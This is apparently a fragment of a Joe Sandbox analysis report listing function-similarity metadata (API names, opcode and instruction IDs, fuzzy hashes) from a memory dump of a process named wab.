                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memset
                    • String ID:
                    • API String ID: 438689982-0
                    • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                    • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                    • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                    • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: FreeLocalmemcpymemsetstrlen
                    • String ID:
                    • API String ID: 3110682361-0
                    • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                    • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                    • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                    • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy
                    • String ID:
                    • API String ID: 3510742995-0
                    • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                    • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                    • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                    • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8